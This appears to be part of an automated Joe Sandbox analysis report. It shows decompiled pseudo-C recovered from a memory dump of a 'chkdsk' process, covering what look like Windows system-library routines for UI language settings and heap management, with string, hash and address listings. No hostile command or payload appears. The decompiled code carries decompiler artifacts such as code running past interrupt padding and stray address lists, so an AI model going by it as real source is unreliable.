                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E04D8E620(void* __ecx, short* __edx, short* _a4) {
                                                      				char _v16;
                                                      				char _v20;
                                                      				intOrPtr _v24;
                                                      				char* _v28;
                                                      				char _v32;
                                                      				char _v36;
                                                      				char _v44;
                                                      				signed int _v48;
                                                      				intOrPtr _v52;
                                                      				void* _v56;
                                                      				void* _v60;
                                                      				char _v64;
                                                      				void* _v68;
                                                      				void* _v76;
                                                      				void* _v84;
                                                      				signed int _t59;
                                                      				signed int _t74;
                                                      				signed short* _t75;
                                                      				signed int _t76;
                                                      				signed short* _t78;
                                                      				signed int _t83;
                                                      				short* _t93;
                                                      				signed short* _t94;
                                                      				short* _t96;
                                                      				void* _t97;
                                                      				signed int _t99;
                                                      				void* _t101;
                                                      				void* _t102;
                                                      
                                                      				_t80 = __ecx;
                                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                      				_t96 = __edx;
                                                      				_v44 = __edx;
                                                      				_t78 = 0;
                                                      				_v56 = 0;
                                                      				if(__ecx == 0 || __edx == 0) {
                                                      					L28:
                                                      					_t97 = 0xc000000d;
                                                      				} else {
                                                      					_t93 = _a4;
                                                      					if(_t93 == 0) {
                                                      						goto L28;
                                                      					}
                                                      					_t78 = E04D8F358(__ecx, 0xac);
                                                      					if(_t78 == 0) {
                                                      						_t97 = 0xc0000017;
                                                      						L6:
                                                      						if(_v56 != 0) {
                                                      							_push(_v56);
                                                      							E04DC95D0();
                                                      						}
                                                      						if(_t78 != 0) {
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                      						}
                                                      						return _t97;
                                                      					}
                                                      					E04DCFA60(_t78, 0, 0x158);
                                                      					_v48 = _v48 & 0x00000000;
                                                      					_t102 = _t101 + 0xc;
                                                      					 *_t96 = 0;
                                                      					 *_t93 = 0;
                                                      					E04DCBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                      					_v36 = 0x18;
                                                      					_v28 =  &_v44;
                                                      					_v64 = 0;
                                                      					_push( &_v36);
                                                      					_push(0x20019);
                                                      					_v32 = 0;
                                                      					_push( &_v64);
                                                      					_v24 = 0x40;
                                                      					_v20 = 0;
                                                      					_v16 = 0;
                                                      					_t97 = E04DC9600();
                                                      					if(_t97 < 0) {
                                                      						goto L6;
                                                      					}
                                                      					E04DCBB40(0,  &_v36, L"InstallLanguageFallback");
                                                      					_push(0);
                                                      					_v48 = 4;
                                                      					_t97 = L04D8F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                      					if(_t97 >= 0) {
                                                      						if(_v52 != 1) {
                                                      							L17:
                                                      							_t97 = 0xc0000001;
                                                      							goto L6;
                                                      						}
                                                      						_t59 =  *_t78 & 0x0000ffff;
                                                      						_t94 = _t78;
                                                      						_t83 = _t59;
                                                      						if(_t59 == 0) {
                                                      							L19:
                                                      							if(_t83 == 0) {
                                                      								L23:
                                                      								E04DCBB40(_t83, _t102 + 0x24, _t78);
                                                      								if(L04D943C0( &_v48,  &_v64) == 0) {
                                                      									goto L17;
                                                      								}
                                                      								_t84 = _v48;
                                                      								 *_v48 = _v56;
                                                      								if( *_t94 != 0) {
                                                      									E04DCBB40(_t84, _t102 + 0x24, _t94);
                                                      									if(L04D943C0( &_v48,  &_v64) != 0) {
                                                      										 *_a4 = _v56;
                                                      									} else {
                                                      										_t97 = 0xc0000001;
                                                      										 *_v48 = 0;
                                                      									}
                                                      								}
                                                      								goto L6;
                                                      							}
                                                      							_t83 = _t83 & 0x0000ffff;
                                                      							while(_t83 == 0x20) {
                                                      								_t94 =  &(_t94[1]);
                                                      								_t74 =  *_t94 & 0x0000ffff;
                                                      								_t83 = _t74;
                                                      								if(_t74 != 0) {
                                                      									continue;
                                                      								}
                                                      								goto L23;
                                                      							}
                                                      							goto L23;
                                                      						} else {
                                                      							goto L14;
                                                      						}
                                                      						while(1) {
                                                      							L14:
                                                      							_t27 =  &(_t94[1]); // 0x2
                                                      							_t75 = _t27;
                                                      							if(_t83 == 0x2c) {
                                                      								break;
                                                      							}
                                                      							_t94 = _t75;
                                                      							_t76 =  *_t94 & 0x0000ffff;
                                                      							_t83 = _t76;
                                                      							if(_t76 != 0) {
                                                      								continue;
                                                      							}
                                                      							goto L23;
                                                      						}
                                                      						 *_t94 = 0;
                                                      						_t94 = _t75;
                                                      						_t83 =  *_t75 & 0x0000ffff;
                                                      						goto L19;
                                                      					}
                                                      				}
                                                      			}
































                                                      Strings
                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04D8E68C
                                                      • InstallLanguageFallback, xrefs: 04D8E6DB
                                                      • @, xrefs: 04D8E6C0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                      • API String ID: 0-1757540487
                                                      • Opcode ID: fea51cbdb3437f4d6c9cdbf4dd764608e5d009d6e039ff442152e2db2fc7d625
                                                      • Instruction ID: 3c3cb4ccb7c316f64b84a1a71e9ecdf768baaeeec4da7b753475d20dce8e32eb
                                                      • Opcode Fuzzy Hash: fea51cbdb3437f4d6c9cdbf4dd764608e5d009d6e039ff442152e2db2fc7d625
                                                      • Instruction Fuzzy Hash: 5D519072608356ABD710EF65D450A7BB3E8FF88758F05096EF985D7240F734EA048BA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E04DBFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                      				char _v5;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				char _v16;
                                                      				char _v17;
                                                      				char _v20;
                                                      				signed int _v24;
                                                      				char _v28;
                                                      				char _v32;
                                                      				signed int _v40;
                                                      				void* __ecx;
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				signed int _t73;
                                                      				intOrPtr* _t75;
                                                      				signed int _t77;
                                                      				signed int _t79;
                                                      				signed int _t81;
                                                      				intOrPtr _t83;
                                                      				intOrPtr _t85;
                                                      				intOrPtr _t86;
                                                      				signed int _t91;
                                                      				signed int _t94;
                                                      				signed int _t95;
                                                      				signed int _t96;
                                                      				signed int _t106;
                                                      				signed int _t108;
                                                      				signed int _t114;
                                                      				signed int _t116;
                                                      				signed int _t118;
                                                      				signed int _t122;
                                                      				signed int _t123;
                                                      				void* _t129;
                                                      				signed int _t130;
                                                      				void* _t132;
                                                      				intOrPtr* _t134;
                                                      				signed int _t138;
                                                      				signed int _t141;
                                                      				signed int _t147;
                                                      				intOrPtr _t153;
                                                      				signed int _t154;
                                                      				signed int _t155;
                                                      				signed int _t170;
                                                      				void* _t174;
                                                      				signed int _t176;
                                                      				signed int _t177;
                                                      
                                                      				_t129 = __ebx;
                                                      				_push(_t132);
                                                      				_push(__esi);
                                                      				_t174 = _t132;
                                                      				_t73 =  !( *( *(_t174 + 0x18)));
                                                      				if(_t73 >= 0) {
                                                      					L5:
                                                      					return _t73;
                                                      				} else {
                                                      					E04D9EEF0(0x4e77b60);
                                                      					_t134 =  *0x4e77b84; // 0x776f7b80
                                                      					_t2 = _t174 + 0x24; // 0x24
                                                      					_t75 = _t2;
                                                      					if( *_t134 != 0x4e77b80) {
                                                      						_push(3);
                                                      						asm("int 0x29");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						_push(0x4e77b60);
                                                      						_t170 = _v8;
                                                      						_v28 = 0;
                                                      						_v40 = 0;
                                                      						_v24 = 0;
                                                      						_v17 = 0;
                                                      						_v32 = 0;
                                                      						__eflags = _t170 & 0xffff7cf2;
                                                      						if((_t170 & 0xffff7cf2) != 0) {
                                                      							L43:
                                                      							_t77 = 0xc000000d;
                                                      						} else {
                                                      							_t79 = _t170 & 0x0000000c;
                                                      							__eflags = _t79;
                                                      							if(_t79 != 0) {
                                                      								__eflags = _t79 - 0xc;
                                                      								if(_t79 == 0xc) {
                                                      									goto L43;
                                                      								} else {
                                                      									goto L9;
                                                      								}
                                                      							} else {
                                                      								_t170 = _t170 | 0x00000008;
                                                      								__eflags = _t170;
                                                      								L9:
                                                      								_t81 = _t170 & 0x00000300;
                                                      								__eflags = _t81 - 0x300;
                                                      								if(_t81 == 0x300) {
                                                      									goto L43;
                                                      								} else {
                                                      									_t138 = _t170 & 0x00000001;
                                                      									__eflags = _t138;
                                                      									_v24 = _t138;
                                                      									if(_t138 != 0) {
                                                      										__eflags = _t81;
                                                      										if(_t81 != 0) {
                                                      											goto L43;
                                                      										} else {
                                                      											goto L11;
                                                      										}
                                                      									} else {
                                                      										L11:
                                                      										_push(_t129);
                                                      										_t77 = E04D96D90( &_v20);
                                                      										_t130 = _t77;
                                                      										__eflags = _t130;
                                                      										if(_t130 >= 0) {
                                                      											_push(_t174);
                                                      											__eflags = _t170 & 0x00000301;
                                                      											if((_t170 & 0x00000301) == 0) {
                                                      												_t176 = _a8;
                                                      												__eflags = _t176;
                                                      												if(__eflags == 0) {
                                                      													L64:
                                                      													_t83 =  *[fs:0x18];
                                                      													_t177 = 0;
                                                      													__eflags =  *(_t83 + 0xfb8);
                                                      													if( *(_t83 + 0xfb8) != 0) {
                                                      														E04D976E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                      													}
                                                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                      													goto L15;
                                                      												} else {
                                                      													asm("sbb edx, edx");
                                                      													_t114 = E04E28938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                      													__eflags = _t114;
                                                      													if(_t114 < 0) {
                                                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                      														E04D8B150();
                                                      													}
                                                      													_t116 = E04E26D81(_t176,  &_v16);
                                                      													__eflags = _t116;
                                                      													if(_t116 >= 0) {
                                                      														__eflags = _v16 - 2;
                                                      														if(_v16 < 2) {
                                                      															L56:
                                                      															_t118 = E04D975CE(_v20, 5, 0);
                                                      															__eflags = _t118;
                                                      															if(_t118 < 0) {
                                                      																L67:
                                                      																_t130 = 0xc0000017;
                                                      																goto L32;
                                                      															} else {
                                                      																__eflags = _v12;
                                                      																if(_v12 == 0) {
                                                      																	goto L67;
                                                      																} else {
                                                      																	_t153 =  *0x4e78638; // 0x0
                                                      																	_t122 = L04D938A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                      																	_t154 = _v12;
                                                      																	_t130 = _t122;
                                                      																	__eflags = _t130;
                                                      																	if(_t130 >= 0) {
                                                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                      																		__eflags = _t123;
                                                      																		if(_t123 != 0) {
                                                      																			_t155 = _a12;
                                                      																			__eflags = _t155;
                                                      																			if(_t155 != 0) {
                                                      																				 *_t155 = _t123;
                                                      																			}
                                                      																			goto L64;
                                                      																		} else {
                                                      																			E04D976E2(_t154);
                                                      																			goto L41;
                                                      																		}
                                                      																	} else {
                                                      																		E04D976E2(_t154);
                                                      																		_t177 = 0;
                                                      																		goto L18;
                                                      																	}
                                                      																}
                                                      															}
                                                      														} else {
                                                      															__eflags =  *_t176;
                                                      															if( *_t176 != 0) {
                                                      																goto L56;
                                                      															} else {
                                                      																__eflags =  *(_t176 + 2);
                                                      																if( *(_t176 + 2) == 0) {
                                                      																	goto L64;
                                                      																} else {
                                                      																	goto L56;
                                                      																}
                                                      															}
                                                      														}
                                                      													} else {
                                                      														_t130 = 0xc000000d;
                                                      														goto L32;
                                                      													}
                                                      												}
                                                      												goto L35;
                                                      											} else {
                                                      												__eflags = _a8;
                                                      												if(_a8 != 0) {
                                                      													_t77 = 0xc000000d;
                                                      												} else {
                                                      													_v5 = 1;
                                                      													L04DBFCE3(_v20, _t170);
                                                      													_t177 = 0;
                                                      													__eflags = 0;
                                                      													L15:
                                                      													_t85 =  *[fs:0x18];
                                                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                      														L18:
                                                      														__eflags = _t130;
                                                      														if(_t130 != 0) {
                                                      															goto L32;
                                                      														} else {
                                                      															__eflags = _v5 - _t130;
                                                      															if(_v5 == _t130) {
                                                      																goto L32;
                                                      															} else {
                                                      																_t86 =  *[fs:0x18];
                                                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                      																}
                                                      																__eflags = _t177;
                                                      																if(_t177 == 0) {
                                                      																	L31:
                                                      																	__eflags = 0;
                                                      																	L04D970F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                      																	goto L32;
                                                      																} else {
                                                      																	__eflags = _v24;
                                                      																	_t91 =  *(_t177 + 0x20);
                                                      																	if(_v24 != 0) {
                                                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                      																		goto L31;
                                                      																	} else {
                                                      																		_t141 = _t91 & 0x00000040;
                                                      																		__eflags = _t170 & 0x00000100;
                                                      																		if((_t170 & 0x00000100) == 0) {
                                                      																			__eflags = _t141;
                                                      																			if(_t141 == 0) {
                                                      																				L74:
                                                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                      																				goto L27;
                                                      																			} else {
                                                      																				_t177 = E04DBFD22(_t177);
                                                      																				__eflags = _t177;
                                                      																				if(_t177 == 0) {
                                                      																					goto L42;
                                                      																				} else {
                                                      																					_t130 = E04DBFD9B(_t177, 0, 4);
                                                      																					__eflags = _t130;
                                                      																					if(_t130 != 0) {
                                                      																						goto L42;
                                                      																					} else {
                                                      																						_t68 = _t177 + 0x20;
                                                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                      																						__eflags =  *_t68;
                                                      																						_t91 =  *(_t177 + 0x20);
                                                      																						goto L74;
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																			goto L35;
                                                      																		} else {
                                                      																			__eflags = _t141;
                                                      																			if(_t141 != 0) {
                                                      																				_t177 = E04DBFD22(_t177);
                                                      																				__eflags = _t177;
                                                      																				if(_t177 == 0) {
                                                      																					L42:
                                                      																					_t77 = 0xc0000001;
                                                      																					goto L33;
                                                      																				} else {
                                                      																					_t130 = E04DBFD9B(_t177, 0, 4);
                                                      																					__eflags = _t130;
                                                      																					if(_t130 != 0) {
                                                      																						goto L42;
                                                      																					} else {
                                                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                      																						_t91 =  *(_t177 + 0x20);
                                                      																						goto L26;
                                                      																					}
                                                      																				}
                                                      																				goto L35;
                                                      																			} else {
                                                      																				L26:
                                                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                      																				__eflags = _t94;
                                                      																				L27:
                                                      																				 *(_t177 + 0x20) = _t94;
                                                      																				__eflags = _t170 & 0x00008000;
                                                      																				if((_t170 & 0x00008000) != 0) {
                                                      																					_t95 = _a12;
                                                      																					__eflags = _t95;
                                                      																					if(_t95 != 0) {
                                                      																						_t96 =  *_t95;
                                                      																						__eflags = _t96;
                                                      																						if(_t96 != 0) {
                                                      																							 *((short*)(_t177 + 0x22)) = 0;
                                                      																							_t40 = _t177 + 0x20;
                                                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                      																							__eflags =  *_t40;
                                                      																						}
                                                      																					}
                                                      																				}
                                                      																				goto L31;
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													} else {
                                                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                      														_t106 =  *(_t147 + 0x20);
                                                      														__eflags = _t106 & 0x00000040;
                                                      														if((_t106 & 0x00000040) != 0) {
                                                      															_t147 = E04DBFD22(_t147);
                                                      															__eflags = _t147;
                                                      															if(_t147 == 0) {
                                                      																L41:
                                                      																_t130 = 0xc0000001;
                                                      																L32:
                                                      																_t77 = _t130;
                                                      																goto L33;
                                                      															} else {
                                                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                      																_t106 =  *(_t147 + 0x20);
                                                      																goto L17;
                                                      															}
                                                      															goto L35;
                                                      														} else {
                                                      															L17:
                                                      															_t108 = _t106 | 0x00000080;
                                                      															__eflags = _t108;
                                                      															 *(_t147 + 0x20) = _t108;
                                                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                      															goto L18;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      											L33:
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L35:
                                                      						return _t77;
                                                      					} else {
                                                      						 *_t75 = 0x4e77b80;
                                                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                      						 *_t134 = _t75;
                                                      						 *0x4e77b84 = _t75;
                                                      						_t73 = E04D9EB70(_t134, 0x4e77b60);
                                                      						if( *0x4e77b20 != 0) {
                                                      							_t73 =  *( *[fs:0x30] + 0xc);
                                                      							if( *((char*)(_t73 + 0x28)) == 0) {
                                                      								_t73 = E04D9FF60( *0x4e77b20);
                                                      							}
                                                      						}
                                                      						goto L5;
                                                      					}
                                                      				}
                                                      			}

















































                                                      0x00000000
                                                      0x04dfbf45
                                                      0x04dfbf3b
                                                      0x04dfbf26
                                                      0x00000000
                                                      0x04dbfc47
                                                      0x04dbfc47
                                                      0x04dbfc49
                                                      0x04dbfcb2
                                                      0x04dbfcb4
                                                      0x04dbfcb6
                                                      0x04dbfcdc
                                                      0x04dbfcdc
                                                      0x00000000
                                                      0x04dbfcb8
                                                      0x04dbfcc3
                                                      0x04dbfcc5
                                                      0x04dbfcc7
                                                      0x00000000
                                                      0x04dbfcc9
                                                      0x04dbfcc9
                                                      0x04dbfccd
                                                      0x00000000
                                                      0x04dbfccd
                                                      0x04dbfcc7
                                                      0x00000000
                                                      0x04dbfc4b
                                                      0x04dbfc4b
                                                      0x04dbfc4e
                                                      0x04dbfc4e
                                                      0x04dbfc51
                                                      0x04dbfc51
                                                      0x04dbfc54
                                                      0x04dbfc5a
                                                      0x04dbfc5c
                                                      0x04dbfc5f
                                                      0x04dbfc61
                                                      0x04dbfc63
                                                      0x04dbfc65
                                                      0x04dbfc67
                                                      0x04dbfc6e
                                                      0x04dbfc72
                                                      0x04dbfc72
                                                      0x04dbfc72
                                                      0x04dbfc72
                                                      0x04dbfc67
                                                      0x04dbfc61
                                                      0x00000000
                                                      0x04dbfc5a
                                                      0x04dbfc49
                                                      0x04dbfc41
                                                      0x04dbfc30
                                                      0x04dbfc27
                                                      0x04dbfc03
                                                      0x04dbfbcd
                                                      0x04dbfbd3
                                                      0x04dbfbd9
                                                      0x04dbfbdc
                                                      0x04dbfbde
                                                      0x04dbfc99
                                                      0x04dbfc9b
                                                      0x04dbfc9d
                                                      0x04dbfcd5
                                                      0x04dbfcd5
                                                      0x04dbfc89
                                                      0x04dbfc89
                                                      0x00000000
                                                      0x04dbfc9f
                                                      0x04dbfc9f
                                                      0x04dbfca3
                                                      0x00000000
                                                      0x04dbfca3
                                                      0x00000000
                                                      0x04dbfbe4
                                                      0x04dbfbe4
                                                      0x04dbfbe4
                                                      0x04dbfbe4
                                                      0x04dbfbe9
                                                      0x04dbfbf2
                                                      0x00000000
                                                      0x04dbfbf2
                                                      0x04dbfbde
                                                      0x04dbfbcb
                                                      0x04dbfbab
                                                      0x04dbfc8b
                                                      0x04dbfc8b
                                                      0x04dbfc8c
                                                      0x04dbfb80
                                                      0x04dbfb72
                                                      0x04dbfb5e
                                                      0x04dbfc8d
                                                      0x04dbfc91
                                                      0x04dbfadf
                                                      0x04dbfadf
                                                      0x04dbfae1
                                                      0x04dbfae4
                                                      0x04dbfae7
                                                      0x04dbfaec
                                                      0x04dbfaf8
                                                      0x04dbfb00
                                                      0x04dbfb07
                                                      0x04dbfb0f
                                                      0x04dbfb0f
                                                      0x04dbfb07
                                                      0x00000000
                                                      0x04dbfaf8
                                                      0x04dbfadd

                                                      Strings
                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04DFBE0F
                                                      • (10, xrefs: 04DBFAF1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (10$*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                      • API String ID: 0-1049297242
                                                      • Opcode ID: 880eaf9bda2c086d34a324533cff42d0dff7220f780649c24df7a37def62b808
                                                      • Instruction ID: 19c4488b3eeb6ca1cc8afabcfc3674070f78883fd8005fd72977927f12c64b63
                                                      • Opcode Fuzzy Hash: 880eaf9bda2c086d34a324533cff42d0dff7220f780649c24df7a37def62b808
                                                      • Instruction Fuzzy Hash: 76A1C071B00605CBEB26DF65CC907BAB3A5FF48724F05456EE986DB680EB34F8418B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E04E4E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v40;
                                                      				char _v44;
                                                      				intOrPtr _v48;
                                                      				signed int _v52;
                                                      				unsigned int _v56;
                                                      				char _v60;
                                                      				signed int _v64;
                                                      				char _v68;
                                                      				signed int _v72;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				char _t87;
                                                      				signed int _t90;
                                                      				signed int _t94;
                                                      				signed int _t100;
                                                      				intOrPtr* _t113;
                                                      				signed int _t122;
                                                      				void* _t132;
                                                      				void* _t135;
                                                      				signed int _t139;
                                                      				signed int* _t141;
                                                      				signed int _t146;
                                                      				signed int _t147;
                                                      				void* _t153;
                                                      				signed int _t155;
                                                      				signed int _t159;
                                                      				char _t166;
                                                      				void* _t172;
                                                      				void* _t176;
                                                      				signed int _t177;
                                                      				intOrPtr* _t179;
                                                      
                                                      				_t179 = __ecx;
                                                      				_v48 = __edx;
                                                      				_v68 = 0;
                                                      				_v72 = 0;
                                                      				_push(__ecx[1]);
                                                      				_push( *__ecx);
                                                      				_push(0);
                                                      				_t153 = 0x14;
                                                      				_t135 = _t153;
                                                      				_t132 = E04E4BBBB(_t135, _t153);
                                                      				if(_t132 == 0) {
                                                      					_t166 = _v68;
                                                      					goto L43;
                                                      				} else {
                                                      					_t155 = 0;
                                                      					_v52 = 0;
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					_v56 = __ecx[1];
                                                      					if( *__ecx >> 8 < 2) {
                                                      						_t155 = 1;
                                                      						_v52 = 1;
                                                      					}
                                                      					_t139 = _a4;
                                                      					_t87 = (_t155 << 0xc) + _t139;
                                                      					_v60 = _t87;
                                                      					if(_t87 < _t139) {
                                                      						L11:
                                                      						_t166 = _v68;
                                                      						L12:
                                                      						if(_t132 != 0) {
                                                      							E04E4BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                      						}
                                                      						L43:
                                                      						if(_v72 != 0) {
                                                      							_push( *((intOrPtr*)(_t179 + 4)));
                                                      							_push( *_t179);
                                                      							_push(0x8000);
                                                      							E04E4AFDE( &_v72,  &_v60);
                                                      						}
                                                      						L46:
                                                      						return _t166;
                                                      					}
                                                      					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                      					asm("sbb edi, edi");
                                                      					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                      					if(_t90 != 0) {
                                                      						_push(0);
                                                      						_push(0x14);
                                                      						_push( &_v44);
                                                      						_push(3);
                                                      						_push(_t179);
                                                      						_push(0xffffffff);
                                                      						if(E04DC9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                      							_push(_t139);
                                                      							E04E4A80D(_t179, 1, _v40, 0);
                                                      							_t172 = 4;
                                                      						}
                                                      					}
                                                      					_t141 =  &_v72;
                                                      					if(E04E4A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                      						_v64 = _a4;
                                                      						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                      						asm("sbb edi, edi");
                                                      						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                      						if(_t94 != 0) {
                                                      							_push(0);
                                                      							_push(0x14);
                                                      							_push( &_v24);
                                                      							_push(3);
                                                      							_push(_t179);
                                                      							_push(0xffffffff);
                                                      							if(E04DC9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                      								_push(_t141);
                                                      								E04E4A80D(_t179, 1, _v20, 0);
                                                      								_t176 = 4;
                                                      							}
                                                      						}
                                                      						if(E04E4A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                      							goto L11;
                                                      						} else {
                                                      							_t177 = _v64;
                                                      							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                      							_t100 = _v52 + _v52;
                                                      							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                      							 *(_t132 + 0x10) = _t146;
                                                      							asm("bsf eax, [esp+0x18]");
                                                      							_v52 = _t100;
                                                      							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                      							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                      							_t47 =  &_a8;
                                                      							 *_t47 = _a8 & 0x00000001;
                                                      							if( *_t47 == 0) {
                                                      								E04DA2280(_t179 + 0x30, _t179 + 0x30);
                                                      							}
                                                      							_t147 =  *(_t179 + 0x34);
                                                      							_t159 =  *(_t179 + 0x38) & 1;
                                                      							_v68 = 0;
                                                      							if(_t147 == 0) {
                                                      								L35:
                                                      								E04D9B090(_t179 + 0x34, _t147, _v68, _t132);
                                                      								if(_a8 == 0) {
                                                      									E04D9FFB0(_t132, _t177, _t179 + 0x30);
                                                      								}
                                                      								asm("lock xadd [eax], ecx");
                                                      								asm("lock xadd [eax], edx");
                                                      								_t132 = 0;
                                                      								_v72 = _v72 & 0;
                                                      								_v68 = _v72;
                                                      								if(E04DA7D50() == 0) {
                                                      									_t113 = 0x7ffe0388;
                                                      								} else {
                                                      									_t177 = _v64;
                                                      									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      								}
                                                      								if( *_t113 == _t132) {
                                                      									_t166 = _v68;
                                                      									goto L46;
                                                      								} else {
                                                      									_t166 = _v68;
                                                      									E04E3FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                      									goto L12;
                                                      								}
                                                      							} else {
                                                      								L23:
                                                      								while(1) {
                                                      									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                      										_t122 =  *_t147;
                                                      										if(_t159 == 0) {
                                                      											L32:
                                                      											if(_t122 == 0) {
                                                      												L34:
                                                      												_v68 = 0;
                                                      												goto L35;
                                                      											}
                                                      											L33:
                                                      											_t147 = _t122;
                                                      											continue;
                                                      										}
                                                      										if(_t122 == 0) {
                                                      											goto L34;
                                                      										}
                                                      										_t122 = _t122 ^ _t147;
                                                      										goto L32;
                                                      									}
                                                      									_t122 =  *(_t147 + 4);
                                                      									if(_t159 == 0) {
                                                      										L27:
                                                      										if(_t122 != 0) {
                                                      											goto L33;
                                                      										}
                                                      										L28:
                                                      										_v68 = 1;
                                                      										goto L35;
                                                      									}
                                                      									if(_t122 == 0) {
                                                      										goto L28;
                                                      									}
                                                      									_t122 = _t122 ^ _t147;
                                                      									goto L27;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					_v72 = _v72 & 0x00000000;
                                                      					goto L11;
                                                      				}
                                                      			}




































                                                      0x04e4e76b
                                                      0x04e4e774
                                                      0x04e4e77a
                                                      0x04e4e77a
                                                      0x04e4e78a
                                                      0x04e4e791
                                                      0x04e4e799
                                                      0x04e4e79b
                                                      0x04e4e79f
                                                      0x04e4e7aa
                                                      0x04e4e7c0
                                                      0x04e4e7ac
                                                      0x04e4e7b2
                                                      0x04e4e7b9
                                                      0x04e4e7b9
